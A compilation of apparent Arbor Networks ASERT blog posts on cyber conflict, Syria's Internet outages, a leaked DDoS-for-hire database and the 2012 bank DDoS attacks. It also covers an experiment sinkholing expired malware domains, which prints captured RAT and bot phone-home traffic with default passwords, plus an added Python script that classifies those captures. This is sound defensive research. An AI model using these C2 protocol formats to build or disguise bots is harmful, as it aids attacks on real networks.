December, 2008 – January, 2009: Israel launched an attack named Operation Cast Lead against the Palestine National Authority. The fighting between the Israeli Defense Forces and Hamas included cyber-attacks against government Web sites and media outlets and involved both State and Non-State actors.

December, 2009 – April, 2010: In the months of unrest leading up to Kyrgyzstan’s second Tulip revolution, the technical unit of Kyrgyzstan intelligence cracked the email account of Gennady Pavlyuk, a leading dissident journalist, to obtain specific data on a project of his, then lured him to Kazakhstan under the pretense of meeting angel investors and killed him.

June 2010: Iran was the victim of a cyber attack when its nuclear facility in Natanz was infiltrated by the now very well-known cyber-worm ‘Stuxnet’.

November 2, 2010: Burma was the victim of a rapidly escalating, large-scale DDoS attack targeting Burma’s main Internet provider, the Ministry of Post and Telecommunication (MPT), disrupting most network traffic in and out of the country.

January 2011: Tunisia’s Jasmine Revolution, which resulted in the overthrow of a corrupt government, included violent protests and the hacking of user names and passwords for the entire online population of Tunisia by AMMAR, the country’s government-run Internet Services Provider (ISP).

January-February 2011: Egypt and Libya are taken offline entirely by their governments.

June 2011: Chinese and Vietnamese attackers started a cyber war over the territorial dispute on the ownership of the Spratly Islands in the South China Sea. 200 Vietnamese Web sites were attacked in June, and 10 percent of those Web sites were managed by government agencies; the attack disabled all the links on these Web sites and placed China’s flag at the center of the page.

March 20, 2013: South Korea is targeted by North Korea in a series of cyberattacks impacting 48,000 computers and servers and hampering banks for two to five days.

April 21, 2013: The U.S. military is increasing its budget for cyber warfare and expanding its offensive capabilities, including the ability to blind an enemy’s radar or shut down its command systems in the event of war, according to two defense officials.

May 2013: A new wave of attacks targeting U.S. energy companies begins, rumored to be driven out of the Middle East. Unlike typical cyberattacks that attempt to obtain confidential information, steal trade secrets and gain competitive advantage, these new attacks seek to destroy data or to manipulate industrial machinery and take over or shut down the networks that deliver energy or run industrial processes.

Again, I’ll leave it to others to debate the semantics of cyberwar. What I do know is that cyberspace is a legitimate battle space. The ongoing attacks against global financial services firms are a great example of how this impacts our business and day-to-day lives. Those attacks have been sustained for over six months, with no end in sight. They are being funded at some level, by someone or some group with very serious motivation that would be difficult to keep going with what we know of traditional hacktivism. We can speculate all day long about who might be behind these attacks, but I’d suggest we leave that to others and focus on learning lessons and building better defenses. In this changing, geopolitically driven environment, understanding the ‘who’ can be near impossible with only digital attribution, but attempting to understand the potential motivation behind attacks can help to better gauge risk to your organization. What has really changed since Estonia? The fact that this type of attack today wouldn’t be nearly as surprising as it was in 2007.


Syria taken offline

By: Darren Anstee -

ATLAS is Arbor Networks’ innovative, one-of-a-kind Internet monitoring system. ATLAS is a collaborative effort with 250+ ISPs globally who have agreed to share anonymous traffic data on an hourly basis (leveraging Arbor’s technology that sits on ISP networks), together with data from Arbor dark address monitoring probes, as well as third-party and other data feeds. In total, ATLAS is seeing 42Tbps of peak IPv4 traffic. With this unique vantage point, Arbor is ideally positioned to deliver intelligence about malware, exploits, phishing and botnets that threaten Internet infrastructure and services. The information is aggregated, analyzed and fed back to our customers via our product deployments.

You can clearly see the traffic we are tracking for Syria drop to virtually 0 at 2000 UTC on the graph.  This will be approximately 1 hour after the drop happened in the ‘real’ world given that ATLAS participants only report hourly.


We’ve seen entire countries in the Mideast taken offline before. Here is a look back to January-February 2011 and Egypt.

Egypt Returns


Digging Through an “Administrative Network Stressor” Provider’s Database

By: Dennis Schwarz -

On March 15, 2013, Brian Krebs of Krebs on Security wrote “The World Has No Room For Cowards.” In it, he writes a fascinating story about a DDoS attack against his site and also a physical attack against his person. The part where Krebs notes that “… there are strong indications that a site named booter.tw may have been involved in the denial-of-service attack on my site yesterday. For some bone-headed reason, the entire customer database file for booter.tw appears to be available for download if you happen to the [sic] know the link to the archive” stood out to me. booter.tw advertises itself as “The Ultimate Administrative Network Stresser [sic] Tool.”


As a security researcher, getting access to a database dump associated with an incident is always interesting. An earlier version of Krebs’ article linked to the database file, so the following are some quick bits and pieces I pulled out of it. Here is a geo IP location map of the ‘lastip’ field of the ‘users’ database table. The assumption here is that these are the last login IPs for the 312 users of the service. It is important to note that proxies, VPN services, the Tor network, and other IP anonymizing services come into play here, and the IPs might not trace back to a user’s actual physical location.


The ‘attacks’ database table contains attacks from January 23, 2013 to March 15, 2013. There were 48,844 entries. Resolving hostnames and parsing out some junk IPs, close to 11,000 unique IPs were targeted. Here is a geo IP location map of the IPs.


The targeted IPs roughly map into the following organization types.


Assuming the ‘duration’ field is in seconds, the average attack duration was 34 minutes. Here is a breakdown of the different attack types:


This posting was a quick visualization of some of booter.tw’s database data as referenced by Krebs. I am glad that he and his family were unharmed during the associated “SWAT”ing attack and I look forward to reading his updates on this fascinating story.

Scavenging Connections On Dynamic-IP Networks Redux

By: Dennis Schwarz -

While a lot has changed since Seth McGann’s 1998 Phrack magazine article “Scavenging Connections On Dynamic-IP Networks,” it’s not hard to extrapolate his idea into modern day malware sinkholes. In this blog post we would like to share some of the connections scavenged over a short period from the No-IP dynamic DNS network–a network we run into time and time again in our malware analysis.

Malware campaigns have not been shy about using these and other dynamic DNS hostnames for their command & control (C&C) servers. With the price (free), dynamic nature, and anonymity (throw-away email addresses and proxies), it’s not hard to see the appeal. Using available APIs, malware authors are building support directly into their bot builder kits as well.


No-IP support built in to the Xtreme Remote Access Trojan (RAT)

Querying our malware zoo for the main free tier domain (no-ip.org) returns almost 6500 unique subdomains. As of this writing, about 4200 (64%) of these no longer resolve and are expired. As a proof of concept, we re-registered 100 of these sub-domains (see Appendix A) and sinkholed them in 4 groups of 25 for 3-4 days at a time. We used a simple sinkhole that redirected all TCP ports except SSH (22) to a Python daemon that limited the connection time to 5 seconds and logged the first 2048 received bytes.

Disregarding general Internet background noise (hi critical.io, proxy scanners, and SQL Slammer), we received connections from around 6650 unique IPs distributed across the globe.


Map of source IPs connecting to a two-week sinkhole of 100 no-ip.org domains

Considering the low number of domains that were registered, many surprises and concerns cropped up. The sheer number of unique sources, geographical distribution, amount of traffic generated by abandoned bots (close to 7 GB of PCAP data), and the variety of malware families was interesting and insightful. There was good representation of both ASCII and binary blob communications, but the latter was more prevalent. The number of HTTP based phone homes was also lower than expected. Further analysis reveals the following interesting elements.

Xtreme RAT

There were two types of phone homes. The first includes a version string and we saw 2.9, 3.1, 3.2, and 3.5 Private (as of this writing, 3.6 is the latest publicly available). The second type of phone home message includes the password used in the campaign and we saw 123123, 87080060, and 1234567890 (default).

Type 1 (130 unique IPs)

myversion|2.9

Type 2 (57 unique IPs)

GET /1234567890.functions HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C)
Host: XXX.no-ip.org:8089
Connection: Keep-Alive
Cache-Control: no-cache

DarkComet

Two types of phone homes were seen.

Type 1 (54 unique IPs)

D573BA5A4EFFC3FB629308

Type 2 (215 unique IPs)

KEEPALIVE8404156

Various IRC Bots (325 unique IPs)

As expected, IRC based bots were well represented. Some sample nicknames:

  • [iRooT-XP-CRI]702619
  • ESP|00|XP|SP3|8254484
  • {00-ITA-2K-ASP–6618}
  • ScAry0518258
  • pwned[00000]

Turkojan (75 unique IPs)

ams

CIA Trojan (3 unique IPs)

details;6333;Administrator;HOME;name;CIA 1.3;No;name

GhostHeart2 (2 unique IPs)

Starting at offset 13, zlib chunk.

00000000  47 68 30 73 74 61 00 00  00 b0 02 00 00 78 9c 4b Gh0sta.. .....x.K
00000010  63 60 60 98 03 c4 ac 40  cc 04 c4 e7 f8 20 f4 40 c``....@ ..... .@
00000020  02 0b 28 2d c4 c8 cc f0  81 0b e2 9e 03 2b 18 78 ..(-.... .....+.x
00000030  f2 72 72 93 49 35 ab 9c  91 81 e1 1e 2f 03 c3 17 .rr.I5.. ..../...
00000040  20 6d 64 60 68 84 2e 6f  7c e6 0d a5 ce 1d 05 54  md`h..o |......T
00000050  04 47 d6 9c 38 bf fd da  f5 97 b8 e4 01 82 d8 11 .G..8... ........
00000060  ac                                               .

MyRat (16 unique IPs)

Starting at offset 13, looks like a zlib chunk.

00000000  4d 79 52 61 74 b8 00 00  00 24 01 00 00 78 9c 4b MyRat... .$...x.K
00000010  8b 33 61 9a c3 c0 c0 c0  0a c4 8c 40 ac c1 c5 c0 .3a..... ...@....
00000020  c0 04 a4 83 53 8b ca 32  93 53 15 02 12 93 b3 15 ....S..2 .S......
00000030  8c 19 18 ae c4 98 30 fd  60 40 00 90 da 1b 46 4f ......0. `@....FO
00000040  18 5a 7d 67 17 86 c4 9a  80 b4 30 74 4a cd 2f 04 .Z}g.... ..0tJ./.
00000050  a9 b1 b0 16 66 c8 60 80  e8 61 66 80 98 07 52 cf ....f.`. .af...R.
00000060  06 c4 02 50 8c 02 14 a0  18 aa ee 25 50 13 33 98 ...P.... ...%P.3.
00000070  c3 c8 70 60 05 a3 e9 32  a0 e0 22 a8 bb 18 8a 0b ..p`...2 ..".....
00000080  52 53 53 d0 0d c0 0e fe  b3 33 30 5c 04 ea cd ae RSS..... .30....
00000090  48 2d 4e ce 2f 4a 65 00  ba 6b 81 2a 44 6e 31 d0 H-N./Je. .k.*Dn1.
000000A0  df 30 3b 97 dd de 70 6a  49 f8 de d2 a5 2e fb be .0;...pj I.......
000000B0  63 33 07 00 3f 40 28 73                          c3..?@(s

YoyoDDoS (471 unique IPs)

0xb8 variant.

00000000  79 6d 74 d8 68 90 95 8e  8f 8d d0 84 8d d1 d8 c1 ymt.h... ........
00000010  c6 c5 c8 d8 69 85 99 94  cd 7b 8f 8a 95 d8 68 8a ....i... .{....h.
00000020  8f 9b 95 8b 8b 8f 8a b8  b8 b8 b8 b8 b8 b8 b8 b8 ........ ........
00000030  b8 b8 b8 b8 b8 b8 b8 b8  b8 b8 b8 b8 b8 b8 b8 b8 ........ ........
00000040  b8 b8 b8 b8 b8 b8 b8 b8  b8 b8 b8 b8 b8 b8 b8 b8 ........ ........
00000050  b8 b8 b8 b8 b8 b8 b8 b8  b8 b8 b8 b8 b8 b8 b8 b8 ........ ........
00000060  b8 b8 b8 b8 b8 b8 b8 b8  b8 b8 b8 b8 b8 b8 b8 b8 ........ ........
00000070  b8 b8 b8 b8 b8 b8 b8 b8  b8 b8 b8 b8 b8 b8 b8 b8 ........ ........
00000080  cb cb ca c7 6d 7a b8 b8  b8 b8 b8 b8 b8 b8 b8 b8 ....mz.. ........
00000090  b8 b8 b8 b8 b8 b8 b8 b8  b8 b8 b8 b8 b8 b8 b8 b8 ........ ........
000000A0  67 91 8e d8 60 68 b8 b8  b8 b8 b8 b8 b8 b8 b8 b8 g...`h.. ........
000000B0  b8 b8 b8 b8 b8 b8 b8 b8  b8 b8 b8 b8 b8 b8 b8 b8 ........ ........
000000C0  e8 59 3c 56 3c 56 b8 b8  b8 b8 b8 b8 b8 b8 b8 b8 .Y<V<V.. ........
000000D0  b8 b8 b8 b8 b8 b8 b8 b8  b8 b8 b8 b8 b8 b8 b8 b8 ........ ........
000000E0  e1 b7 b8 b8                                      ....

Trojan.DDoser (5 unique IPs)

Base64 encoded.

*SNEW*/2||*||RGVmYXVsdA==||*||Uk8=||*||NC4y||*||WFAgeDg2||*||name||*||QVVUSExPQURFUkRFRkFVTFQ=||*||

Spy-Net RAT (19 unique IPs)

Base64 encoded.

hZGVPsqmMkI|

Unknown #1 (2 unique IPs)

104|OnConnect|United States|me|name - me|172.16.3.44|Not Detected|4.0.4 Update 2|United States|OnConnect|

Unknown #2 (2 unique IPs)

Two version numbers were seen: 4.0 and 6.0.

LOGIN|Slovakia#SK|name and something like a password hash|#!#|pixel|name|name-PC|Windows 7|Connection Established|Intel(R) Pentium(R) M processor 1600MHz 1598MHz|0,5|Not Available|Not Available||140|4.0|123456

Unknown #3 (16 unique IPs)

Two version numbers were seen: 0.7 and 1.2.

02|Dell@DELL-name|XP/Vista|TR|1700|N|t+1.2|1.2|-|
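To turn captures like the ones above into a first-pass family tag, here is a classifier for the first bytes of a sinkholed connection. It is an added example, not ASERT's sinkhole or classification code; it keys on the phone-home samples shown in this post (Xtreme RAT, DarkComet, CIA Trojan, the Gh0st/MyRat header with its zlib chunk at offset 13, Trojan.DDoser), and the family-to-pattern mapping, the hex-token rule for DarkComet type 1 and the shortened Xtreme RAT HTTP request are this example's assumptions.

```python
"""Tag the first bytes of a sinkholed connection with a likely malware family.

Added example, not ASERT's sinkhole or classifier code. Patterns follow the
phone-home samples in the post; the family-to-pattern mapping, the DarkComet
hex-token rule and the shortened Xtreme RAT HTTP request are assumptions.
"""
import base64
import re
import struct
import zlib
from typing import Optional

# Gh0st-style framing seen for GhostHeart2 and MyRat: 5-byte magic, total
# length and uncompressed length (little-endian u32 each), zlib at offset 13.
COMPRESSED_MAGICS = {b"Gh0st": "GhostHeart2", b"MyRat": "MyRat"}
HEADER_LEN = 13


def parse_compressed_header(data: bytes) -> Optional[dict]:
    """Parse a Gh0st/MyRat header; None if the magic is not recognised."""
    if len(data) < HEADER_LEN or data[:5] not in COMPRESSED_MAGICS:
        return None
    total_len, raw_len = struct.unpack_from("<II", data, 5)
    info = {
        "family": COMPRESSED_MAGICS[data[:5]],
        "total_len": total_len,
        "uncompressed_len": raw_len,
        "length_ok": total_len == len(data),  # False if the 2048-byte capture cut it
        "zlib_magic": data[HEADER_LEN:HEADER_LEN + 2] == b"\x78\x9c",
    }
    try:  # a truncated or hand-copied stream must not crash the classifier
        body = zlib.decompress(data[HEADER_LEN:total_len])
        info["decompressed_ok"] = len(body) == raw_len
    except zlib.error:
        info["decompressed_ok"] = False
    return info


def _b64_field(field: str) -> str:
    """Decode one Trojan.DDoser field; keep it verbatim if not ASCII base64."""
    try:
        return base64.b64decode(field, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return field


def classify(data: bytes) -> dict:
    """Return {"family": ...} plus whatever fields the phone-home exposes."""
    hdr = parse_compressed_header(data)
    if hdr:
        return hdr
    text = data.decode("latin-1").strip()
    if text.startswith("myversion|"):  # Xtreme RAT type 1
        return {"family": "Xtreme RAT", "type": 1, "version": text.split("|", 1)[1]}
    m = re.match(r"GET /(\d+)\.functions HTTP/1\.[01]", text)
    if m:  # Xtreme RAT type 2: the campaign password is the requested path
        return {"family": "Xtreme RAT", "type": 2, "password": m.group(1)}
    m = re.fullmatch(r"KEEPALIVE(\d+)", text)
    if m:  # DarkComet type 2
        return {"family": "DarkComet", "type": 2, "keepalive_id": m.group(1)}
    if re.fullmatch(r"[0-9A-F]{16,}", text):  # DarkComet type 1 (assumed hex token)
        return {"family": "DarkComet", "type": 1, "token": text}
    if text.startswith("details;"):  # CIA Trojan: 6th ';' field carries the version
        fields = text.split(";")
        return {"family": "CIA Trojan", "version": fields[5] if len(fields) > 5 else None}
    if text.startswith("*SNEW*"):  # Trojan.DDoser: '||*||'-separated base64 fields
        fields = [f for f in text.split("||*||")[1:] if f]
        return {"family": "Trojan.DDoser", "fields": [_b64_field(f) for f in fields]}
    return {"family": "unknown", "preview": text[:40]}


# Samples copied from the post's captures ("name"/"XXX" are the post's redactions).
SAMPLES = {
    "xtreme1": b"myversion|2.9",
    "xtreme2": b"GET /1234567890.functions HTTP/1.1\r\nAccept: */*\r\n"
               b"Host: XXX.no-ip.org:8089\r\nConnection: Keep-Alive\r\n\r\n",
    "darkcomet1": b"D573BA5A4EFFC3FB629308",
    "darkcomet2": b"KEEPALIVE8404156",
    "cia": b"details;6333;Administrator;HOME;name;CIA 1.3;No;name",
    "ddoser": b"*SNEW*/2||*||RGVmYXVsdA==||*||Uk8=||*||NC4y||*||WFAgeDg2||*||name"
              b"||*||QVVUSExPQURFUkRFRkFVTFQ=||*||",
    "gh0st": bytes.fromhex(  # the 97-byte GhostHeart2 phone-home from the post
        "4768307374610000 00b0020000789c4b 6360609803c4ac40 cc04c4e7f820f440"
        "020b282dc4c8ccf0 810be29e032b1878 f27272934935ab9c 9181e11e2f03c317"
        "206d646068842e6f 7ce60da5ce1d0554 0447d69c38bffdda f597b8e40182d811 ac"),
}

if __name__ == "__main__":
    for label, blob in SAMPLES.items():
        print(f"{label:11s} -> {classify(blob)}")
```

The Gh0st header check reports the declared lengths and whether the zlib stream inflated to the declared size, so a capture cut off by the 2048-byte limit is flagged rather than mis-tagged.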

This analysis of a small sample of No-IP domains and their associated malware gives us a tiny peek into some, possibly forgotten, attack campaigns and how active they can be. While No-IP and other dynamic DNS hostnames shouldn’t automatically be assumed to be bad, we feel they warrant further scrutiny and attention if seen on your networks.

It should come as no surprise that there is a lot of malware out there, in all sorts of shapes and sizes. Sinkholing is just another tool in the malware researcher’s toolbox for the endless task of classifying, analyzing, and mitigating the shadier half of the Internet. In the meantime, the ASERT team’s work continues on the sinkholing project. Goals include expanding the scope, automating collection and classification as much as possible, and, of course, integrating the data into the ATLAS portal.

********

Appendix 1: Domains

Between Nov 6-8:

Between Nov 9 – 12:

Between Nov 13 – 15:

Between Nov 16 – 19:

Lessons learned from the U.S. financial services DDoS attacks

By: Arbor Networks -

By Dan Holden and Curt Wilson of Arbor’s Security Engineering & Response Team (ASERT)

During the months of September and October we witnessed targeted and very serious DDoS attacks against U.S. based financial institutions. They were very much premeditated, focused, advertised before the fact, and executed to the letter.

In the case of the September 2012 DDoS attack series, many compromised PHP Web applications were used as bots in the attacks. Additionally, many WordPress sites, often using the out-of-date TimThumb plugin, were being compromised around the same time. Joomla and other PHP-based applications were also compromised. Unmaintained sites running out-of-date extensions are easy targets and the attackers took full advantage of this to upload various PHP webshells which were then used to further deploy attack tools. Attackers connect to the compromised webservers hosting the tools directly or through intermediate servers/proxies/scripts and issue attack commands. In the September 2012 attacks there were several PHP based tools used, the most prominent of which was “Brobot” along with two other tools, KamiKaze and AMOS which were used a bit less often.  Brobot has also been referred to as “itsoknoproblembro”.

The attack tactics observed were a mix of application layer attacks on HTTP, HTTPS and DNS with volumetric attack traffic on a variety of TCP, UDP, ICMP and other IP protocols. The other obvious and uncommon factor at play was the launch of simultaneous attacks, at high bandwidth, against multiple companies in the same vertical.

On December 10, 2012, the group claiming responsibility for the prior attacks, the Izz ad-Din al-Qassam Cyber Fighters, announced “Phase 2 Operation Ababil”. A new wave of attacks was announced on their Pastebin page, which described their targets as follows:

“Continually, the goals under attacks of this week are including: U.S. Bancorp, JPMorgan Chase&co, Bank of America, PNC Financial Services Group, SunTrust Banks, Inc.”

On December 11, 2012, attacks on several of these victims were observed. Some attacks looked similar in construction to Brobot v1; however, Brobot v2 introduces a newly crafted DNS packet attack and a few other changes to the attacks.

These attacks have shown why DDoS continues to be such a popular and effective attack vector. Yes, DDoS can take the form of very large attacks. In fact, some of this week’s attacks have been as large as 60Gbps. What makes these attacks so significant is not their size, but the fact that the attacks are quite focused, part of an ongoing campaign, and like most DDoS attacks quite public. These attacks utilize multiple targets, from network infrastructure to Web applications.

Lessons Learned

While there has been much speculation about who is behind these attacks, our focus is less on the who or why than on how we can successfully defend. There are multiple lessons to be learned from these attacks, by everyone involved – the targeted enterprises, their managed security providers, Website and Web application administrators, and the vendor community.

For enterprises, it is clear that typical perimeter defenses such as firewalls and IPS are not effective when dealing with DDoS attacks, as each technology inline to the target is actually a potential bottleneck. These devices can be an important part of a layered defense strategy, but they were built for problems far different from today’s complex DDoS threat. Given the complexity of today’s threat landscape, and the nature of application layer attacks, it is increasingly clear that enterprises need better visibility and control over their networks, which requires a purpose-built, on-premises DDoS mitigation solution. This could sound self-serving; however, visibility into a DDoS attack needs to be far better than the first report of your Website or critical business asset going down. Without real-time knowledge of the attack, defense and recovery become increasingly difficult.

Providers of managed security services have begun to evaluate their deployments and mitigation capacity. These attacks were unique in that they targeted multiple organizations within the same vertical, putting a strain on the capacity of providers’ cloud-based mitigation services.

What these attacks have continued to demonstrate is that DDoS will continue to be a popular and increasingly complex attack vector. DDoS is no longer simply a network issue, but is increasingly a feature or additional aspect of other threats. The motivation of modern attackers can be singular, but the threat landscape continues to become more complex and mixes various threats to increase the likelihood of success. There have certainly been cases where the MSSP was successful at mitigating an attack but the target Website still went down due to corruption of the underlying application and data. In order to defend networks today, enterprises need to deploy DDoS security in multiple layers, from the perimeter of their network to the provider cloud, and ensure that on-premises equipment can work in harmony with provider networks for effective and robust attack mitigation.


Snapshot: Syria’s Internet drops, returns

By: Darren Anstee -

The Arbor ATLAS system leverages Arbor Networks’ world-wide service provider customer base to gather data about Internet traffic patterns and threats. Currently 246 of Arbor’s customers are actively participating in the Arbor ATLAS system, and are sharing data on an hourly basis. The data shared includes information on the traffic crossing the boundaries of participating networks, and the kinds of DDoS attacks they are seeing. The graph below shows the cumulative ‘total’ traffic (to / from) Syria across all of these participating networks. This does not show the total traffic into and out of Syria; it is simply a snapshot taken from the vantage point of 246 network operators around the world.

As you can see, traffic dropped sharply at around 1730 in the graph below. The low level could indicate either a reduction in traffic to / from Syria or an outage of less than an hour (as the data is at one hour granularity). The actual traffic interruption is likely to have occurred at around 1630; the graph shows the interruption an hour later than this because ATLAS participants report to our servers hourly, at varying times.

Syria goes dark

By: Darren Anstee -

UPDATE: Syria’s back online


ORIGINAL POST

The ATLAS infrastructure leverages Arbor Networks’ world-wide service provider customer base to gather data about Internet traffic patterns and threats.  Currently 246 of Arbor’s customers are actively participating in the ATLAS program, and are sharing data on an hourly basis.

The data shared includes information on the traffic crossing the boundaries of participating networks, and the kinds of DDoS attacks they are seeing. The graph below shows the cumulative ‘total’ traffic (to / from) Syria across all of these participating networks. This does not show the total traffic into and out of Syria; it is simply a snapshot taken from the vantage point of 246 network operators around the world. As you can see, traffic dropped to virtually nothing earlier today. The actual traffic interruption is likely to have occurred between 1000 and 1100 today; the graph shows the interruption an hour later than this because ATLAS participants report to our servers hourly, at varying times.

(UPDATED: as of 5:50am ET on 12/1/12)


As a reminder, this is not the first time we have seen a complete cut off of Internet access in the Middle East. You may recall that back in January 2011, something similar occurred in Egypt.
